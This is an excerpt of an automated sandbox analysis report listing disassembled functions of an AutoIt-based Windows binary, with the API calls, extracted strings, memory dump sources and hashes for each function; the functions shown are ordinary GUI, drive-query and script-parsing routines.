                          • Opcode Fuzzy Hash: c9a4a02a5ee51f7e30acdbcc1ed5a501eccadf887b82f90a562895c018356d73
                          • Instruction Fuzzy Hash: F6A13E71A40215BFEB14DBA9DC49FAE7BB9EB09710F004655FA14B72E1DBB0AD00CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4E45E
                          • GetDriveTypeW.KERNEL32(?,00B9DC88,?,\\.\,00B9DBF0), ref: 00B4E54B
                          • SetErrorMode.KERNEL32(00000000,00B9DC88,?,\\.\,00B9DBF0), ref: 00B4E6B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 964b2a24bdb64374933e6affaa4be2bbe6ec498714e35ed363652e4b4e253533
                          • Instruction ID: 7cda31c9117d6252f0761a8c4cbb616a0e4c2e2af487bd730d12e78568523bc2
                          • Opcode Fuzzy Hash: 964b2a24bdb64374933e6affaa4be2bbe6ec498714e35ed363652e4b4e253533
                          • Instruction Fuzzy Hash: 0451B830244301ABCA10DF14C8D1979BBE1FB64B04F564AD9F466A72E5DBB0DF45E742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          • Opcode ID: bc1f35499c93a502ecd8512e6574306fe035823e1630c305460784857d0ebb39
                          • Instruction ID: 993fd4997b91b3bb3499a05f2740a1183190ea898b70662cdbfddddc2550ccad
                          • Opcode Fuzzy Hash: bc1f35499c93a502ecd8512e6574306fe035823e1630c305460784857d0ebb39
                          • Instruction Fuzzy Hash: 52615931600312B7DB21BB249C82FBA3BE8EF15740F1441F4FD59EA2D2EB64DA41D6A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DestroyWindow.USER32 ref: 00B04956
                          • DeleteObject.GDI32(00000000), ref: 00B04998
                          • DeleteObject.GDI32(00000000), ref: 00B049A3
                          • DestroyCursor.USER32(00000000), ref: 00B049AE
                          • DestroyWindow.USER32(00000000), ref: 00B049B9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B7E179
                          • 6F570200.COMCTL32(?,000000FF,?), ref: 00B7E1B2
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B7E5E0
                            • Part of subcall function 00B049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B04954,00000000), ref: 00B04A23
                          • SendMessageW.USER32 ref: 00B7E627
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B7E63E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                          • String ID: 0
                          • API String ID: 2008601239-4108050209
                          • Opcode ID: f3ac35ba6b43c6bd89ec22efbd0dc66bbf8945569b95841882acab495bd58a41
                          • Instruction ID: b497e20cafe61af0d9f2f28fe86fd83dcc7e70825a3c9c45763ec73cd399b560
                          • Opcode Fuzzy Hash: f3ac35ba6b43c6bd89ec22efbd0dc66bbf8945569b95841882acab495bd58a41
                          • Instruction Fuzzy Hash: B5128D706002019FDB25DF24C888BAABBE5FF59304F5485E9F5A9DB2A2C731E845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(?,?,00B9DBF0), ref: 00B66245
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          • Opcode ID: 2d1fc69e25597a0eaeab7652f587e7385f7ea277a8da762f043c7638e5d405a4
                          • Instruction ID: 2fc8eab01f3e3081b56f0835d2b45cf243e5d19564bcc2a0c00f6f671b8b6147
                          • Opcode Fuzzy Hash: 2d1fc69e25597a0eaeab7652f587e7385f7ea277a8da762f043c7638e5d405a4
                          • Instruction Fuzzy Hash: F1C15F34204201CBCB04EF54C491ABE7BD6AF94354F5448E9B8865B3A7DF35ED4ACB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSysColor.USER32(00000012), ref: 00B6D3BE
                          • SetTextColor.GDI32(?,?), ref: 00B6D3C2
                          • GetSysColorBrush.USER32(0000000F), ref: 00B6D3D8
                          • GetSysColor.USER32(0000000F), ref: 00B6D3E3
                          • CreateSolidBrush.GDI32(?), ref: 00B6D3E8
                          • GetSysColor.USER32(00000011), ref: 00B6D400
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6D40E
                          • SelectObject.GDI32(?,00000000), ref: 00B6D41F
                          • SetBkColor.GDI32(?,00000000), ref: 00B6D428
                          • SelectObject.GDI32(?,?), ref: 00B6D435
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D454
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6D46B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B6D480
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6D4A8
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B6D4CF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00B6D4ED
                          • DrawFocusRect.USER32(?,?), ref: 00B6D4F8
                          • GetSysColor.USER32(00000011), ref: 00B6D506
                          • SetTextColor.GDI32(?,00000000), ref: 00B6D50E
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B6D522
                          • SelectObject.GDI32(?,00B6D0B5), ref: 00B6D539
                          • DeleteObject.GDI32(?), ref: 00B6D544
                          • SelectObject.GDI32(?,?), ref: 00B6D54A
                          • DeleteObject.GDI32(?), ref: 00B6D54F
                          • SetTextColor.GDI32(?,?), ref: 00B6D555
                          • SetBkColor.GDI32(?,?), ref: 00B6D55F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 2db2aa94e582e32e231152b386703f52005d27cc1739ec61e429d53f579e2e85
                          • Instruction ID: af0d099aebb7456a92c4abe7ee0f7f64180d068e912410c1a2330602bd2d3e1d
                          • Opcode Fuzzy Hash: 2db2aa94e582e32e231152b386703f52005d27cc1739ec61e429d53f579e2e85
                          • Instruction Fuzzy Hash: DE510B71900218AFDF10AFA4DC88EAE7BB9FF48320F114556F915AB2E1DB759D40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B6B5C0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B6B5D1
                          • CharNextW.USER32(0000014E), ref: 00B6B600
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B6B641
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B6B657
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B6B668
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B6B685
                          • SetWindowTextW.USER32(?,0000014E), ref: 00B6B6D7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B6B6ED
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B6B71E
                          • _memset.LIBCMT ref: 00B6B743
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B6B78C
                          • _memset.LIBCMT ref: 00B6B7EB
                          • SendMessageW.USER32 ref: 00B6B815
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B6B86D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00B6B91A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B6B93C
                          • GetMenuItemInfoW.USER32(?), ref: 00B6B986
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B6B9B3
                          • DrawMenuBar.USER32(?), ref: 00B6B9C2
                          • SetWindowTextW.USER32(?,0000014E), ref: 00B6B9EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: a75416766fe3062caf6e697284a59880ad8c4de922fd234908d66616ed755263
                          • Instruction ID: 1b02a6b2df049556e7fe93b8047a6368674b2e0c5e14d5f3dc42a362fcf1a9d3
                          • Opcode Fuzzy Hash: a75416766fe3062caf6e697284a59880ad8c4de922fd234908d66616ed755263
                          • Instruction Fuzzy Hash: 97E15B71900218ABDF219F94CC84EEE7BF8EF15714F108196F919EB291DB788A81DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCursorPos.USER32(?), ref: 00B67587
                          • GetDesktopWindow.USER32 ref: 00B6759C
                          • GetWindowRect.USER32(00000000), ref: 00B675A3
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B67605
                          • DestroyWindow.USER32(?), ref: 00B67631
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B6765A
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B67678
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B6769E
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00B676B3
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B676C6
                          • IsWindowVisible.USER32(?), ref: 00B676E6
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B67701
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B67715
                          • GetWindowRect.USER32(?,?), ref: 00B6772D
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00B67753
                          • GetMonitorInfoW.USER32 ref: 00B6776D
                          • CopyRect.USER32(?,?), ref: 00B67784
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00B677EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 4ab9163aacf5c7f325a157b4b650a3e412f6d50f74d90801de826c963b257383
                          • Instruction ID: 11a6be2d878ec8a1e468623f6b224977a2816edefcf2fc24a76902584ed6f09a
                          • Opcode Fuzzy Hash: 4ab9163aacf5c7f325a157b4b650a3e412f6d50f74d90801de826c963b257383
                          • Instruction Fuzzy Hash: D5B1AF71608301AFDB04DF64C988B6ABBE5FF88314F008A9DF5999B291DB74EC04CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B1A839
                          • GetSystemMetrics.USER32(00000007), ref: 00B1A841
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B1A86C
                          • GetSystemMetrics.USER32(00000008), ref: 00B1A874
                          • GetSystemMetrics.USER32(00000004), ref: 00B1A899
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B1A8B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B1A8C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B1A8F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B1A90D
                          • GetClientRect.USER32(00000000,000000FF), ref: 00B1A92B
                          • GetStockObject.GDI32(00000011), ref: 00B1A947
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1A952
                            • Part of subcall function 00B1B736: GetCursorPos.USER32(000000FF), ref: 00B1B749
                            • Part of subcall function 00B1B736: ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          • SetTimer.USER32(00000000,00000000,00000028,00B1ACEE), ref: 00B1A979
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: b17531c6a5d1fe61feab86945b9dd437c827b5d276a3d1653d4ab66fdb6ba274
                          • Instruction ID: 4405a1a9e85c5e4d33be74f0729b96e7674e4a6ba594df023ae0ddd8117b4682
                          • Opcode Fuzzy Hash: b17531c6a5d1fe61feab86945b9dd437c827b5d276a3d1653d4ab66fdb6ba274
                          • Instruction Fuzzy Hash: 84B13A71A0120AAFDB14DFA8DC85BE97BF4FB08314F51426AFA15A72E0DB74E841CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00B66A52
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B66B12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 14ffe7dca63126c29986f86b94f9f0d3ac5e0ba54c02667bac26c072c53a21ea
                          • Instruction ID: d609acdd89820ed70a72155c3d8eb283442ff5204b1baed1c14e8dac09f0d172
                          • Opcode Fuzzy Hash: 14ffe7dca63126c29986f86b94f9f0d3ac5e0ba54c02667bac26c072c53a21ea
                          • Instruction Fuzzy Hash: E3A16F302146019FCB04EF14C991ABAB7E5FF84314F5489E9B896AB3D2DB74ED09CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3DD87
                          • __swprintf.LIBCMT ref: 00B3DE28
                          • _wcscmp.LIBCMT ref: 00B3DE3B
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B3DE90
                          • _wcscmp.LIBCMT ref: 00B3DECC
                          • GetClassNameW.USER32(?,?,00000400), ref: 00B3DF03
                          • GetDlgCtrlID.USER32(?), ref: 00B3DF55
                          • GetWindowRect.USER32(?,?), ref: 00B3DF8B
                          • GetParent.USER32(?), ref: 00B3DFA9
                          • ScreenToClient.USER32(00000000), ref: 00B3DFB0
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3E02A
                          • _wcscmp.LIBCMT ref: 00B3E03E
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B3E064
                          • _wcscmp.LIBCMT ref: 00B3E078
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                          • String ID: %s%u
                          • API String ID: 3119225716-679674701
                          • Opcode ID: 27e120162a7e5d1745d47f90a2b184fb101a874dee6210eae259d685c5c246b0
                          • Instruction ID: c883f547e62e43a961a6f24461266ea932e3c6a8e440ce5025fd1fae3ee90dc5
                          • Opcode Fuzzy Hash: 27e120162a7e5d1745d47f90a2b184fb101a874dee6210eae259d685c5c246b0
                          • Instruction Fuzzy Hash: 26A1C371204306AFDB18DF64D885FAAB7E9FF44310F20856AF9A9C7190DB30EA45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B3E6E1
                          • _wcscmp.LIBCMT ref: 00B3E6F2
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B3E71A
                          • CharUpperBuffW.USER32(?,00000000), ref: 00B3E737
                          • _wcscmp.LIBCMT ref: 00B3E755
                          • _wcsstr.LIBCMT ref: 00B3E766
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3E79E
                          • _wcscmp.LIBCMT ref: 00B3E7AE
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B3E7D5
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3E81E
                          • _wcscmp.LIBCMT ref: 00B3E82E
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B3E856
                          • GetWindowRect.USER32(00000004,?), ref: 00B3E8BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: f20848b5b31d376e245b5ec52f4f53439c93d5d45d0e1932b8ecf241a9c6e5cf
                          • Instruction ID: bd99a582b32ffc4367e66a573f0499b0057730a3e30f0965f016246e2a5f9952
                          • Opcode Fuzzy Hash: f20848b5b31d376e245b5ec52f4f53439c93d5d45d0e1932b8ecf241a9c6e5cf
                          • Instruction Fuzzy Hash: 4A819F310082099BDB15CF14D885FAA7BE8FF54714F2485ABFDA99A0D1DB30ED46CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 36ca81ec0bd1979f69d1ffc4241cdc1e182b57a91160cc26f69f321af25696d7
